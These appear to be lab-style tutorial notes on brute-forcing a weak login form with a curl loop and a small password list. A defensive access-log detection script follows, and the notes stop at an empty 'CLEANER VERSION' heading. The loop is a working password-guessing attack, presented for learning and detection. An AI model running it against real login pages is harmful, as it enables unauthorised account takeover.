BRUTE FORCING W/ CURL

This method uses cURL to automate login attempts and brute-force a weak login form.

root@oco:~$ nano passwords.txt
 admin123
 password
 letmein
 secretpass
 secret
 
root@oco:~$ nano loop.sh
 # This works only if the passwords contain no spaces; it will break on whitespace or special characters.
 # A safer version uses "while IFS= read -r pass; do".
 for pass in $(cat passwords.txt); do
   echo "Trying password: $pass"
   # If a password contains special characters (&, =, +), the request may break when using -d "username=admin&password=$pass".
   # It is best to use --data-urlencode "password=$pass".
   response=$(curl -s -X POST -d "username=admin&password=$pass" http://MACHINE_IP/bruteforce.php)
   if echo "$response" | grep -q "Welcome"; then
     echo "[+] Password found: $pass"
     break
   fi
 done
 
root@oco:~$ chmod +x loop.sh
root@oco:~$ ./loop.sh

 * $(cat passwords.txt) reads each password from the file.
 * curl -s sends the login request silently (no progress meter).
    - The response is stored in a variable.
 * grep -q checks if the response contains a success string (like “Welcome”).
    - When found, it prints the working password and exits the loop.
    
 * This exact method underpins tools like Hydra, Burp Intruder, and WFuzz. By doing it 
   manually, you understand what's happening under the hood: a repetitive HTTP POST with 
   variable data, waiting for a different response.
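
From the defending side, the same repetitive POST is easy to spot in the web server's access log. The script below is an added example, not part of the original notes: it flags any client IP that sends more than a set number of POSTs to the login path within one minute, and reports whether the response size changed during the burst (a hint that a guess may have succeeded). The combined log format, the sample log lines, the threshold and the function names are assumptions.

```shell
#!/bin/sh
# Added example (not from the original page): spot the loop's footprint in a
# web server access log. Assumes combined log format; the path and the
# per-minute limit passed below are assumptions, not values from the page.

detect_login_bursts() {
  # $1 = access log, $2 = login path, $3 = max POSTs per IP per minute
  awk -v path="$2" -v limit="$3" '
    $6 == "\"POST" && $7 == path {
      key = $1 " " substr($4, 2, 17)        # client IP + dd/Mon/yyyy:HH:MM
      count[key]++
      if (!(key in first)) first[key] = $10 # size of first response in burst
      last[key] = $10                       # size of most recent response
    }
    END {
      for (k in count)
        if (count[k] > limit) {
          changed = (first[k] != last[k]) ? "yes" : "no"
          print k, "posts=" count[k], "response_changed=" changed
        }
    }
  ' "$1" | sort
}

write_sample_log() {
  # Constructed log lines (documentation IP ranges), not captured traffic.
  cat > "$1" <<'EOF'
203.0.113.7 - - [12/Mar/2025:10:15:01 +0000] "POST /bruteforce.php HTTP/1.1" 200 512 "-" "curl/8.5.0"
203.0.113.7 - - [12/Mar/2025:10:15:02 +0000] "POST /bruteforce.php HTTP/1.1" 200 512 "-" "curl/8.5.0"
203.0.113.7 - - [12/Mar/2025:10:15:03 +0000] "POST /bruteforce.php HTTP/1.1" 200 512 "-" "curl/8.5.0"
203.0.113.7 - - [12/Mar/2025:10:15:04 +0000] "POST /bruteforce.php HTTP/1.1" 200 512 "-" "curl/8.5.0"
203.0.113.7 - - [12/Mar/2025:10:15:05 +0000] "POST /bruteforce.php HTTP/1.1" 200 734 "-" "curl/8.5.0"
198.51.100.4 - - [12/Mar/2025:10:15:20 +0000] "GET /bruteforce.php HTTP/1.1" 200 498 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Mar/2025:10:15:31 +0000] "POST /bruteforce.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
EOF
}

sample=$(mktemp)
write_sample_log "$sample"
detect_login_bursts "$sample" /bruteforce.php 3
rm -f "$sample"
```

A form that locks the account or throttles the client after a few failures removes the "different response" the loop is waiting for, which is why this approach only works against a weak login form.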

CLEANER VERSION
